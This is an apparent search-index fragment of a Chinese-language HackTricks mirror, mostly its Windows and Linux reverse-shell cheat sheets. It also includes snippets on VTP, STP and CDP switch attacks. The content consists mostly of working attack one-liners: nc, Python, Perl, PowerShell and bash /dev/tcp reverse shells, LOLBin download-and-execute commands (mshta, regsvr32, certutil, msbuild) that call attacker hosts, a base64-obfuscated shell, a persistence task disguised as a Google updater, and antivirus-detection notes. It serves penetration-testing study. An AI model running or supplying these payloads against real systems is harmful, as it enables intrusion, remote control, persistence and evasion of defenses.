Windows 中没有 SUID 文件或 sudo 权限 ,但了解一些 binaries 是 如何 被(滥)用来执行某些意想不到的操作(例如 execute arbitrary code )是很有用的。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Lolbas","id":"1191","title":"Lolbas"},"1192":{"body":"bash nc.exe -e cmd.exe ","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » NC","id":"1192","title":"NC"},"1193":{"body":"受害者 ncat.exe -e \\"cmd.exe /c (cmd.exe 2>&1)\\"\\n#Encryption to bypass firewall\\nncat.exe --ssl -e \\"cmd.exe /c (cmd.exe 2>&1)\\" 攻击者 ncat -l \\n#Encryption to bypass firewall\\nncat -l --ssl","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » NCAT","id":"1193","title":"NCAT"},"1194":{"body":"sbd 是一个便携且安全的 Netcat 替代工具 。它可在类 Unix 系统和 Win32 上运行。具有强加密、程序执行、可自定义源端口和持续重连等特性,sbd 为 TCP/IP 通信提供了一个多功能的解决方案。对于 Windows 用户,可使用来自 Kali Linux 发行版的 sbd.exe 作为 Netcat 的可靠替代品。 bash # Victims machine\\nsbd -l -p 4444 -e bash -v -n\\nlistening on port 4444 # Atackers\\nsbd 10.10.10.10 4444\\nid\\nuid=0(root) gid=0(root) groups=0(root)","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » SBD","id":"1194","title":"SBD"},"1195":{"body":"bash #Windows\\nC:\\\\Python27\\\\python.exe -c \\"(lambda __y, __g, __contextlib: [[[[[[[(s.connect((\'10.11.0.37\', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(\'except\', (), {\'__enter__\': lambda self: None, \'__exit__\': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type(\'try\', (), {\'__enter__\': lambda self: None, \'__exit__\': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[\'p2s_thread\'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[\'s2p_thread\'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g[\'p\'] in [(subprocess.Popen([\'\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe\'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g[\'s\'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[\'p2s\'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[\'s\'].send(__l[\'p\'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[\'s\'], __l[\'p\'] in [(s, p)]][0])({}), \'p2s\')]][0] for __g[\'s2p\'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[\'p\'].stdin.write(__l[\'data\']), __after())[1] if (len(__l[\'data\']) > 0) else __after())(lambda: __this()) for __l[\'data\'] in [(__l[\'s\'].recv(1024))]][0] if True else __after())())(lambda: None) for __l[\'s\'], __l[\'p\'] in [(s, p)]][0])({}), \'s2p\')]][0] for __g[\'os\'] in [(__import__(\'os\', __g, __g))]][0] for __g[\'socket\'] in [(__import__(\'socket\', __g, __g))]][0] for __g[\'subprocess\'] in [(__import__(\'subprocess\', __g, __g))]][0] for __g[\'threading\'] in [(__import__(\'threading\', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(\'contextlib\'))\\"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Python","id":"1195","title":"Python"},"1196":{"body":"bash perl -e \'use Socket;$i=\\"ATTACKING-IP\\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"/bin/sh -i\\");};\'\\nperl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,\\"ATTACKING-IP:80\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Perl","id":"1196","title":"Perl"},"1197":{"body":"bash #Windows\\nruby -rsocket -e \'c=TCPSocket.new(\\"[IPADDR]\\",\\"[PORT]\\");while(cmd=c.gets);IO.popen(cmd,\\"r\\"){|io|c.print io.read}end\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Ruby","id":"1197","title":"Ruby"},"1198":{"body":"bash lua5.1 -e \'local host, port = \\"127.0.0.1\\", 4444 local socket = require(\\"socket\\") local tcp = socket.tcp() local io = require(\\"io\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \'r\') local s = f:read(\\"*a\\") f:close() tcp:send(s) if status == \\"closed\\" then break end end tcp:close()\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Lua","id":"1198","title":"Lua"},"1199":{"body":"攻击者 (Kali) bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response 受害者 bash #Linux\\nopenssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows\\nopenssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » OpenSSH","id":"1199","title":"OpenSSH"},"12":{"body":"Venacus 是一个数据泄露(leak)搜索引擎。 我们提供随机字符串搜索(如谷歌)覆盖所有类型的大大小小的数据泄露——不仅仅是大的——来自多个来源的数据。 人们搜索、AI 搜索、组织搜索、API(OpenAPI)访问、theHarvester 集成,所有渗透测试人员所需的功能。 HackTricks 继续成为我们所有人的一个伟大学习平台,我们为赞助它感到自豪! Venacus | Data breach search engine","breadcrumbs":"HackTricks » Venacus","id":"12","title":"Venacus"},"120":{"body":"VTP (VLAN Trunking Protocol) 将 VLAN 管理集中化。它使用 revision numbers 来维护 VLAN 数据库的完整性;任何修改都会使该数字递增。switches 会采用具有更高 revision number 的配置,更新它们自己的 VLAN 数据库。 VTP Domain Roles VTP Server: 管理 VLAN——创建、删除、修改。它向域内成员广播 VTP announcements。 VTP Client: 接收 VTP announcements 以同步其 VLAN 数据库。该角色被限制不能本地修改 VLAN 配置。 VTP Transparent: 不参与 VTP 更新但会转发 VTP announcements。不受 VTP 攻击影响,其 revision number 始终为零。 VTP Advertisement Types Summary Advertisement: 由 VTP server 每 300 秒广播一次,携带域的基本信息。 Subset Advertisement: 在 VLAN 配置更改后发送。 Advertisement Request: 由 VTP client 发出以请求 Summary Advertisement,通常是在检测到更高的配置 revision number 时。 VTP 漏洞仅能通过 trunk ports 利用,因为 VTP announcements 仅在这些端口上传播。Post-DTP 攻击情形可能会转向 VTP。像 Yersinia 这样的工具可以辅助进行 VTP 攻击,目标是清除 VLAN 数据库,从而有效地破坏网络。 注意:此处讨论的是 VTP version 1 (VTPv1)。 bash yersinia -G # Launch Yersinia in graphical mode 在 Yersinia 的 graphical mode 中,选择 deleting all VTP vlans 选项以清除 VLAN 数据库。","breadcrumbs":"Pentesting Network » VTP 攻击","id":"120","title":"VTP 攻击"},"1200":{"body":"bash powershell -exec bypass -c \\"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(\'http://10.2.0.5/shell.ps1\')|iex\\"\\npowershell \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.9:8000/ipw.ps1\')\\"\\nStart-Process -NoNewWindow powershell \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.222.0.26:8000/ipst.ps1\')\\"\\necho IEX(New-Object Net.WebClient).DownloadString(\'http://10.10.14.13:8000/PowerUp.ps1\') | powershell -noprofile 执行网络调用的进程: powershell.exe Payload 已写入磁盘: NO ( 至少在我使用 procmon 查找时没有发现! ) bash powershell -exec bypass -f \\\\\\\\webdavserver\\\\folder\\\\payload.ps1 发起网络调用的进程: svchost.exe Payload 写入磁盘: WebDAV client local cache \\\\ 一行命令: bash $client = New-Object System.Net.Sockets.TCPClient(\\"10.10.10.10\\",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \\"PS \\" + (pwd).Path + \\"> \\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 在本文档末尾获取有关不同 Powershell Shells 的更多信息","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Powershell","id":"1200","title":"Powershell"},"1201":{"body":"From here bash mshta vbscript:Close(Execute(\\"GetObject(\\"\\"script:http://webserver/payload.sct\\"\\")\\")) bash mshta http://webserver/payload.hta bash mshta \\\\\\\\webdavserver\\\\folder\\\\payload.hta hta-psh reverse shell 示例 (使用 hta 下载并执行 PS backdoor) xml 你可以非常容易地使用 stager hta 下载并执行 Koadic zombie hta 示例 从这里 xml \\n\\n\\n\\n\\n\\n\\n\\n mshta - sct 来自此处 xml \\n\\n\\n\\n\\n\\n\\n\\n Mshta - Metasploit bash use exploit/windows/misc/hta_server\\nmsf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109\\nmsf exploit(windows/misc/hta_server) > set lhost 192.168.1.109\\nmsf exploit(windows/misc/hta_server) > exploit bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Mshta","id":"1201","title":"Mshta"},"1202":{"body":"Dll hello world 示例 来自此处 bash rundll32 \\\\\\\\webdavserver\\\\folder\\\\payload.dll,entrypoint bash rundll32.exe javascript:\\"\\\\..\\\\mshtml,RunHTMLApplication\\";o=GetObject(\\"script:http://webserver/payload.sct\\");window.close(); 被 defender 检测到 Rundll32 - sct From here xml \\n\\n\\n\\n\\n\\n\\n Rundll32 - Metasploit bash use windows/smb/smb_delivery\\nrun\\n#You will be given the command to run in the victim: rundll32.exe \\\\\\\\10.2.0.5\\\\Iwvc\\\\test.dll,0 Rundll32 - Koadic bash use stager/js/rundll32_js\\nset SRVHOST 192.168.1.107\\nset ENDPOINT sales\\nrun\\n#Koadic will tell you what you need to execute inside the victim, it will be something like:\\nrundll32.exe javascript:\\"\\\\..\\\\mshtml, RunHTMLApplication \\";x=new%20ActiveXObject(\\"Msxml2.ServerXMLHTTP.6.0\\");x.open(\\"GET\\",\\"http://10.2.0.5:9997/ownmG\\",false);x.send();eval(x.responseText);window.close();","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Rundll32","id":"1202","title":"Rundll32"},"1203":{"body":"来自此处 bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll regsvr32 /u /n /s /i:\\\\\\\\webdavserver\\\\folder\\\\payload.sct scrobj.dll 被 Defender 检测到 Regsvr32 – arbitrary DLL export with /i argument (gatekeeping & persistence) 除了加载远程 scriptlets (scrobj.dll) 外,regsvr32.exe 还会加载本地 DLL 并调用其 DllRegisterServer/DllUnregisterServer 导出。自定义 loader 经常滥用该行为以在与已签名的 LOLBin 混淆的情况下执行任意代码。野外观测到的两个实战提示: Gatekeeping argument: DLL 会在未通过 /i: 传入特定开关时退出,例如使用 /i:--type=renderer 模拟 Chromium 的 renderer 子进程。这可以减少意外执行并增加对沙箱的干扰。 Persistence: 计划任务调度 regsvr32 以静默并以高权限运行该 DLL,并传入所需的 /i 参数,伪装成更新程序任务: powershell Register-ScheduledTask \\\\\\n-Action (New-ScheduledTaskAction -Execute \\"regsvr32\\" -Argument \\"/s /i:--type=renderer \\\\\\"%APPDATA%\\\\Microsoft\\\\SystemCertificates\\\\.dll\\\\\\"\\") \\\\\\n-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \\\\\\n-TaskName \'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}\' \\\\\\n-TaskPath \'\\\\\\\\GoogleSystem\\\\\\\\GoogleUpdater\' \\\\\\n-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \\\\\\n-RunLevel Highest See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with regsvr32. Clipboard Hijacking From here html \\n\\n\\n\\n\\n\\n\\n Regsvr32 - Metasploit bash use multi/script/web_delivery\\nset target 3\\nset payload windows/meterpreter/reverse/tcp\\nset lhost 10.2.0.5\\nrun\\n#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll 你可以非常容易地使用 stager regsvr 下载并执行 Koadic 僵尸","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Regsvr32","id":"1203","title":"Regsvr32"},"1204":{"body":"From here 下载一个 B64dll,将其解码并执行。 bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\InstallUtil /logfile= /LogToConsole=false /u payload.dll 下载一个 B64exe,对其进行解码并执行。 bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Certutil","id":"1204","title":"Certutil"},"1205":{"body":"bash powershell.exe -c \\"(New-Object System.NET.WebClient).DownloadFile(\'http://10.2.0.5:8000/reverse_shell.vbs\',\\\\\\"$env:temp\\\\test.vbs\\\\\\");Start-Process %windir%\\\\system32\\\\cscript.exe \\\\\\"$env:temp\\\\test.vbs\\\\\\"\\" Cscript - Metasploit bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs 被 Defender 检测","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Cscript/Wscript","id":"1205","title":"Cscript/Wscript"},"1206":{"body":"bash \\\\\\\\webdavserver\\\\folder\\\\batchfile.bat 执行网络调用的进程: svchost.exe 写入磁盘的 Payload: WebDAV 客户端本地缓存 bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat\\nimpacket-smbserver -smb2support kali `pwd` bash \\\\\\\\10.8.0.3\\\\kali\\\\shell.bat 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Bat","id":"1206","title":"PS-Bat"},"1207":{"body":"Attacker msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi\\npython -m SimpleHTTPServer 80 受害者: victim> msiexec /quiet /i \\\\\\\\10.2.0.5\\\\kali\\\\shell.msi 已检测","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » MSIExec","id":"1207","title":"MSIExec"},"1208":{"body":"From here bash wmic os get /format:\\"https://webserver/payload.xsl\\" 示例 xsl 文件 from here : xml \\n\\n\\n\\n\\n\\n 未被检测到 你可以非常容易地使用 stager wmic 下载并执行 Koadic zombie","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Wmic","id":"1208","title":"Wmic"},"1209":{"body":"From here cmd /V /c \\"set MB=\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\MSBuild.exe\\" & !MB! /noautoresponse /preprocess \\\\\\\\webdavserver\\\\folder\\\\payload.xml > payload.xml & !MB! payload.xml\\" 你可以使用此技术绕过 Application Whitelisting 和 Powershell.exe 的限制。你将被提示进入 PS shell。 只需下载并执行它: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe MSBuildShell.csproj 未检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Msbuild","id":"1209","title":"Msbuild"},"121":{"body":"如果你无法在接口上捕获 BPDU 帧,成功进行 STP 攻击的可能性很低。 STP BPDU DoS 发送大量 BPDUs TCP (Topology Change Notification) 或 Conf (the BPDUs that are sent when the topology is created) 会使交换机过载并停止正常工作。 bash yersinia stp -attack 2\\nyersinia stp -attack 3\\n#Use -M to disable MAC spoofing STP TCP Attack 当发送 TCP 时,switches 的 CAM table 会在 15s 内被清除。然后,如果你持续发送这类 packets,CAM table 将不断重置(或每 15segs 一次),当它重置时,switch 会表现得像 hub。 bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds\\nyersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen STP Root Attack 攻击者模拟一个 switch 的行为以成为网络的 STP root。然后,更多的数据会通过它。这在你连接到两个不同的 switch 时很有用。 这通过发送 BPDUs CONF packets 来完成,声称 priority 值低于当前 root switch 的实际 priority 。 bash yersinia stp -attack 4 #Behaves like the root switch\\nyersinia stp -attack 5 #This will make the device behaves as a switch but will not be root 如果攻击者连接到两台交换机,他可以成为新生成树的根节点,并且这些交换机之间的所有流量都会通过他 (将执行一个 MITM 攻击。) bash yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets \\"Sniff\\" --> \\"Bridged sniffing\\"\\nettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages","breadcrumbs":"Pentesting Network » STP 攻击","id":"121","title":"STP 攻击"},"1210":{"body":"在 victim machine 上编译 C# 代码。 C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe /unsafe /out:shell.exe shell.cs 你可以从这里下载一个基本的 C# reverse shell: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc 未被检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » CSC","id":"1210","title":"CSC"},"1211":{"body":"从这里 bash C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\regasm.exe /u \\\\\\\\webdavserver\\\\folder\\\\payload.dll 我还没有尝试过 https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Regasm/Regsvc","id":"1211","title":"Regasm/Regsvc"},"1212":{"body":"来自此处 bash odbcconf /s /a {regsvr \\\\\\\\webdavserver\\\\folder\\\\payload_dll.txt} 我没有尝试过 https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Odbcconf","id":"1212","title":"Odbcconf"},"1213":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Powershell Shells","id":"1213","title":"Powershell Shells"},"1214":{"body":"https://github.com/samratashok/nishang 在 Shells 文件夹中,有很多不同的 shells。要下载并执行 Invoke- PowerShellTcp.ps1 ,请复制该脚本并将其追加到文件末尾: Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 在 web 服务器上托管该脚本,并在受害者端执行: powershell -exec bypass -c \\"iwr(\'http://10.11.0.134/shell2.ps1\')|iex\\" Defender 目前尚未将其识别为恶意代码(截至 3/04/2019)。 TODO: 检查其他 nishang shells","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Nishang","id":"1214","title":"PS-Nishang"},"1215":{"body":"https://github.com/besimorhino/powercat 下载,启动一个 web 服务器,启动 listener,然后在受害者端执行: powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/powercat.ps1\')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd\\" Defender 尚未将其检测为 malicious code(3/04/2019)。 powercat 提供的其他选项: Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... Serve a cmd Shell:\\npowercat -l -p 443 -e cmd\\nSend a cmd Shell:\\npowercat -c 10.1.1.1 -p 443 -e cmd\\nSend a powershell:\\npowercat -c 10.1.1.1 -p 443 -ep\\nSend a powershell UDP:\\npowercat -c 10.1.1.1 -p 443 -ep -u\\nTCP Listener to TCP Client Relay:\\npowercat -l -p 8000 -r tcp:10.1.1.16:443\\nGenerate a reverse tcp payload which connects back to 10.1.1.15 port 443:\\npowercat -c 10.1.1.15 -p 443 -e cmd -g\\nStart A Persistent Server That Serves a File:\\npowercat -l -p 443 -i C:\\\\inputfile -rep","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Powercat","id":"1215","title":"PS-Powercat"},"1216":{"body":"https://github.com/EmpireProject/Empire 创建一个 powershell launcher,将其保存到文件中,然后下载并执行它。 powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/launcher.ps1\')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd\\" 检测为恶意 code","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Empire","id":"1216","title":"Empire"},"1217":{"body":"https://github.com/trustedsec/unicorn 使用 unicorn 创建 metasploit 后门的 powershell 版本 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 使用已创建的 resource 启动 msfconsole: msfconsole -r unicorn.rc 启动一个 Web 服务器来托管 powershell_attack.txt 文件,并在受害者上执行: powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/powershell_attack.txt\')|iex\\" 已被检测为恶意代码","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » MSF-Unicorn","id":"1217","title":"MSF-Unicorn"},"1218":{"body":"PS>Attack PS 控制台,预加载了一些攻击性 PS 模块(加密) https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9 WinPWN PS 控制台,包含一些攻击性 PS 模块并具备代理检测(IEX)","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » 更多","id":"1218","title":"更多"},"1219":{"body":"https://highon.coffee/blog/reverse-shell-cheat-sheet/ https://gist.github.com/Arno0x https://github.com/GreatSCT/GreatSCT https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ https://www.hackingarticles.in/koadic-com-command-control-framework/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » 参考资料","id":"1219","title":"参考资料"},"122":{"body":"CISCO Discovery Protocol (CDP) 对于 CISCO 设备之间的通信至关重要,允许它们 相互识别并共享配置细节 。 被动数据收集 CDP 被配置为通过所有端口广播信息,这可能导致安全风险。攻击者在连接到交换机端口后,可能会部署像 Wireshark 、 tcpdump 或 Yersinia 这样的网络嗅探器。此类操作可能会暴露关于网络设备的敏感信息,包括其型号和运行的 Cisco IOS 版本。攻击者随后可能针对识别出的 Cisco IOS 版本中的特定漏洞发动攻击。 诱发 CDP 表泛洪 更具攻击性的方法是通过耗尽交换机的内存来发起 Denial of Service (DoS) 攻击,伪装成合法的 CISCO 设备。下面是使用 Yersinia(一款用于测试的网络工具)发起此类攻击的命令序列: bash sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices\\n# Alternatively, for a GUI approach:\\nsudo yersinia -G 在此攻击期间,交换机的 CPU 和 CDP 邻居表会被严重占用,因资源过度消耗而通常称为 “网络瘫痪” 。 CDP Impersonation Attack bash sudo yersinia cdp -attack 2 #Simulate a new CISCO device\\nsudo yersinia cdp -attack 0 #Send a CDP packet You could also use scapy . Be sure to install it with scapy/contrib package.","breadcrumbs":"Pentesting Network » CDP 攻击","id":"122","title":"CDP 攻击"},"1220":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果你对这些shell有任何疑问,可以查看 https://explainshell.com/","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Shells - Linux","id":"1220","title":"Shells - Linux"},"1221":{"body":"一旦你获得了反向shell 请阅读此页面以获取完整的TTY 。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Full TTY","id":"1221","title":"Full TTY"},"1222":{"body":"bash curl https://reverse-shell.sh/1.1.1.1:3000 | bash\\nbash -i >& /dev/tcp// 0>&1\\nbash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP\\n0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196\\nexec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done #Short and bypass (credits to Dikline)\\n(sh)0>/dev/tcp/10.10.10.10/9091\\n#after getting the previous shell to get the output to execute\\nexec >&0 不要忘记检查其他 shell:sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh 和 bash。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Bash | sh","id":"1222","title":"Bash | sh"},"1223":{"body":"bash #If you need a more stable connection do:\\nbash -c \'bash -i >& /dev/tcp// 0>&1\' #Stealthier method\\n#B64 encode the shell like: echo \\"bash -c \'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1\'\\" | base64 -w0\\necho bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null Shell 解释 bash -i : 该命令的这一部分启动一个交互式(-i)Bash shell。 >& : 该命令的这一部分是一个简写符号,用于 将标准输出 (stdout)和 标准错误 (stderr) 重定向到同一目的地 。 /dev/tcp// : 这是一个特殊文件, 表示与指定IP地址和端口的TCP连接 。 通过 将输出和错误流重定向到此文件 ,该命令有效地将交互式shell会话的输出发送到攻击者的机器。 0>&1 : 该命令的这一部分 将标准输入(stdin)重定向到与标准输出(stdout)相同的目的地 。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 符号安全 shell","id":"1223","title":"符号安全 shell"},"1224":{"body":"bash echo -e \'#!/bin/bash\\\\nbash -i >& /dev/tcp/1/ 0>&1\' > /tmp/sh.sh; bash /tmp/sh.sh;\\nwget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 创建文件并执行","id":"1224","title":"创建文件并执行"},"1225":{"body":"当处理基于 Linux 的 web 应用程序中的 Remote Code Execution (RCE) 漏洞时,实现反向 shell 可能会受到网络防御措施的阻碍,例如 iptables 规则或复杂的包过滤机制。在这种受限环境中,另一种方法是建立一个 PTY(伪终端)shell,以更有效地与被攻陷的系统进行交互。 推荐的工具是 toboggan ,它简化了与目标环境的交互。 要有效使用 toboggan,请创建一个针对目标系统 RCE 上下文量身定制的 Python 模块。例如,一个名为 nix.py 的模块可以结构如下: python3 import jwt\\nimport httpx def execute(command: str, timeout: float = None) -> str:\\n# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution\\ntoken = jwt.encode(\\n{\\"cmd\\": command.replace(\\" \\", \\"${IFS}\\")}, \\"!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^\\", algorithm=\\"HS256\\"\\n) response = httpx.get(\\nurl=\\"https://vulnerable.io:3200\\",\\nheaders={\\"Authorization\\": f\\"Bearer {token}\\"},\\ntimeout=timeout,\\n# ||BURP||\\nverify=False,\\n) # Check if the request was 